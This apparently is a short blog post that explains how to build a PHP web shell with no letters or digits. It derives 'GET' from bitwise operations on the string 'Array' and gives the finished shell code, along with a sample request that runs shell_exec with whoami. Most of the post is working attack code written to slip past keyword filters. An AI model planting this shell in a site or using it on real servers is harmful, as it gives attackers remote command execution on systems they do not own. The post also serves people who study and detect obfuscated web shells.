Published 14 years 8 months ago • Last updated March 22, 2025 • ⏱️ 2 min read
So a small php shell was tweeted around and it inspired me to investigate a way to execute non-alphanumeric code. First off I started with the idea of using octal escapes in PHP and constructing the escape so for example: \107 is "G" if I could construct the "107" and add the backslash to the beginning maybe I could construct "G". It worked like this:
$_=+"";
$_=(++$_)+(++$_)+(++$_)+(++$_);
$__=+"";
$__++;
$___=$_*$_+$__+$__+$__+$__+$__+$__+$__;//107
$___="\\$___";
But there was no way to evaluate the escape once it was constructed without using alphanum chars. So I was stumped. Then I had a brain wave, php automatically does a string conversion for arrays and converts them to "Array" when accessed as a string. I had "A", "r", "r" etc but I really needed "GET" in order to create a nice small non-alpha shell.
Onto the second technique, PHP allows you to use bitwise operators on strings :D
'a'|'b';//c!
We can make new characters by combining others, but I only had a limited set to work with. A simple for loop later I combined the characters to create "GET" and thus make our non-alphanum small PHP shell :D
<?
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"0x06").($_[+""]|"0x05").($_[+""]^"0x15");
?>
<?=${'_'.$_}['_'](${'_'.$_}['__']);?>
The first part converts a string into an array by attempting to assign to "0" position of the string. Then I make sure the array is a string. Then I use "A" from array with bitwise operators to construct "G", "E" and "T" using the characters "A"|0x6, "A"|0x5 and "A^0x15". There you have it,you could even generate non-alpha code without using GET quite easily by producing different characters until you get an eval method.
To call the shell you'd use: ?_=shell_exec&__=whoami
Don't forget in order to analyze php code use RIPS if you ever encounter this in the wild.